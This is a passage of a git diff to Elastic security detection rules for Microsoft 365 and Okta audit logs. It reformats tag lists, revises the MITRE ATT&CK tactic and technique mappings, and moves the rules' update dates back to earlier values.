+2,7 @@ creation_date = "2026/02/24" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/24" [rule] author = ["Elastic"] @@ -52,7 +52,16 @@ references = ["https://cloud.google.com/blog/topics/threat-intelligence/expansio risk_score = 21 rule_id = "4f2654e4-125b-11f1-af7d-f661ea17fbce" severity = "low" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Collection", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -92,18 +101,35 @@ web where event.dataset == "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1619" +name = "Cloud Storage Object Discovery" +reference = "https://attack.mitre.org/techniques/T1619/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" - [[rule.threat.technique.subtechnique]] id = "T1213.002" name = "Sharepoint" reference = "https://attack.mitre.org/techniques/T1213/002/" +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml index d2d87fd2d44..cc943708bc7 100644 --- a/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml +++ b/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -67,7 +67,7 @@ references = [ risk_score = 47 rule_id = "ff4dd44a-0ac6-44c4-8609-3f81bc820f02" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Collection", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Tactic: Exfiltration", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -78,18 +78,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1114" -name = "Email Collection" -reference = "https://attack.mitre.org/techniques/T1114/" +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" -[[rule.threat.technique.subtechnique]] -id = "T1114.003" -name = "Email Forwarding Rule" -reference = "https://attack.mitre.org/techniques/T1114/003/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml index ef9c4fa2887..ed1b40e8736 100644 --- a/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml +++ b/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -68,7 +68,7 @@ references = [ risk_score = 47 rule_id = "272a6484-2663-46db-a532-ef734bf9a796" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Tactic: Exfiltration", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -79,18 +79,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + diff --git a/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml b/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml index 34979e5bdcc..50995758898 100644 --- a/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml +++ b/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/24" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -79,7 +79,15 @@ references = [ risk_score = 47 rule_id = "0c3c80de-08c2-11f0-bd11-f661ea17fbcc" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access", + "Tactic: Credential Access", +] timestamp_override = "event.ingested" type = "new_terms" @@ -94,16 +102,34 @@ event.dataset: "o365.audit" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml index e4b0251791c..f97a3f4fe2b 100644 --- a/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml +++ b/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -65,7 +65,15 @@ references = [ risk_score = 47 rule_id = "929d0766-204b-11f0-9c1f-f661ea17fbcd" severity = "medium" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access", +] timestamp_override = "event.ingested" type = "query" @@ -133,31 +141,29 @@ event.dataset: "o365.audit" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" - [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml b/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml index 6066dad1266..bf11a1e50c2 100644 --- a/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml +++ b/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/04" [rule] author = ["Elastic", "Austin Songer"] @@ -75,7 +75,15 @@ references = [ risk_score = 47 rule_id = "2de10e77-c144-4e69-afb7-344e7127abd0" severity = "medium" -tags = ["Domain: Identity", "Tactic: Credential Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Identity", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -95,21 +103,27 @@ event.dataset:o365.audit [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] -id = "T1606" -name = "Forge Web Credentials" -reference = "https://attack.mitre.org/techniques/T1606/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1606.002" -name = "SAML Tokens" -reference = "https://attack.mitre.org/techniques/T1606/002/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["o365.audit.UserId", "o365.audit.ErrorNumber"] diff --git a/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml b/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml index 1515f163b1b..f460f945f23 100644 --- a/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml +++ b/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/12" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/04" [rule] author = ["Elastic"] @@ -74,13 +74,24 @@ event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.a [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml b/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml index 3caea118249..15f54581589 100644 --- a/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml +++ b/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/15" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/04" [rule] author = ["Austin Songer"] @@ -77,3 +77,11 @@ event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.c ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml b/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml index 7f4d3ef8c88..29d2607f6cb 100644 --- a/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml +++ b/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/10" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/25" [rule] author = ["Elastic"] @@ -75,13 +75,30 @@ event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFi [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1080" name = "Taint Shared Content" reference = "https://attack.mitre.org/techniques/T1080/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1608" +name = "Stage Capabilities" +reference = "https://attack.mitre.org/techniques/T1608/" +[[rule.threat.technique.subtechnique]] +id = "T1608.001" +name = "Upload Malware" +reference = "https://attack.mitre.org/techniques/T1608/001/" + + +[rule.threat.tactic] +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" + diff --git a/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml b/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml index 8045ac1ec6b..68a66be6744 100644 --- a/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml +++ b/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/10" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/25" [rule] author = ["Elastic"] @@ -74,13 +74,30 @@ event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePoint [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1080" name = "Taint Shared Content" reference = "https://attack.mitre.org/techniques/T1080/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1608" +name = "Stage Capabilities" +reference = "https://attack.mitre.org/techniques/T1608/" +[[rule.threat.technique.subtechnique]] +id = "T1608.001" +name = "Upload Malware" +reference = "https://attack.mitre.org/techniques/T1608/001/" + + +[rule.threat.tactic] +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" + diff --git a/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml b/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml index 7320db56d55..1768e604eac 100644 --- a/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml +++ b/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/06" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -59,7 +59,16 @@ references = [ risk_score = 47 rule_id = "88671231-6626-4e1b-abb7-6e361a171fbb" severity = "medium" -tags = ["Domain: Cloud", "Domain: SaaS", "Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Domain: Identity", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -78,36 +87,19 @@ event.dataset:o365.audit [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/o365/persistence_exchange_management_role_assignment.toml b/rules/integrations/o365/persistence_exchange_management_role_assignment.toml index dc8eced2b23..3618f364ed9 100644 --- a/rules/integrations/o365/persistence_exchange_management_role_assignment.toml +++ b/rules/integrations/o365/persistence_exchange_management_role_assignment.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/20" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -67,7 +67,13 @@ references = [ risk_score = 47 rule_id = "98995807-5b09-4e37-8a54-5cae5dc932d7" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -78,36 +84,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml b/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml index 5432108c661..71b93df4cac 100644 --- a/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml +++ b/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic", "Austin Songer"] @@ -73,7 +73,16 @@ references = [ risk_score = 21 rule_id = "0ce6487d-8069-4888-9ddd-61b52490cebc" severity = "low" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Data Source: Microsoft Exchange", "Data Source: Microsoft 365 Audit Logs", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft Exchange", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Configuration Audit", + "Tactic: Persistence", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "new_terms" @@ -107,39 +116,22 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.002" name = "Additional Email Delegate Permissions" reference = "https://attack.mitre.org/techniques/T1098/002/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.002" -name = "Additional Email Delegate Permissions" -reference = "https://attack.mitre.org/techniques/T1098/002/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["o365.audit.UserId"] diff --git a/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml b/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml index c3a951755b8..6b821fb7bfe 100644 --- a/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml +++ b/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Austin Songer"] @@ -64,7 +64,13 @@ references = [ risk_score = 21 rule_id = "684554fc-0777-47ce-8c9b-3d01f198d7f8" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Microsoft 365", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -77,46 +83,19 @@ event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" - [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.007" -name = "Hybrid Identity" -reference = "https://attack.mitre.org/techniques/T1556/007/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.007" -name = "Hybrid Identity" -reference = "https://attack.mitre.org/techniques/T1556/007/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml index 8d34ebf4f65..e354d1a2bfa 100644 --- a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml +++ b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/02" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic", "Austin Songer"] @@ -87,36 +87,34 @@ event.dataset:o365.audit [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml index a138eaf5c54..a7c2689ef36 100644 --- a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml +++ b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -65,7 +65,12 @@ references = [ risk_score = 73 rule_id = "3805c3dc-f82c-4f8d-891e-63c24d3102b0" severity = "high" -tags = ["Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Okta", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Data Source: Okta", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -76,36 +81,14 @@ event.dataset:okta.system and event.action:user.mfa.attempt_bypass [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1111" +name = "Multi-Factor Authentication Interception" +reference = "https://attack.mitre.org/techniques/T1111/" -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml b/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml index fb5b188fca0..0c7a8ec869e 100644 --- a/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml +++ b/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic", "@BenB196", "Austin Songer"] @@ -79,21 +79,17 @@ event.dataset:okta.system and event.action:user.account.lock [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.001" -name = "Password Guessing" -reference = "https://attack.mitre.org/techniques/T1110/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.threshold] field = ["okta.actor.alternate_id"] value = 3 diff --git a/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml b/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml index 607e0c6f2f3..032c715eb49 100644 --- a/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml +++ b/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/10" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/08" [rule] author = ["Elastic"] @@ -92,16 +92,32 @@ event.dataset:okta.system [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" 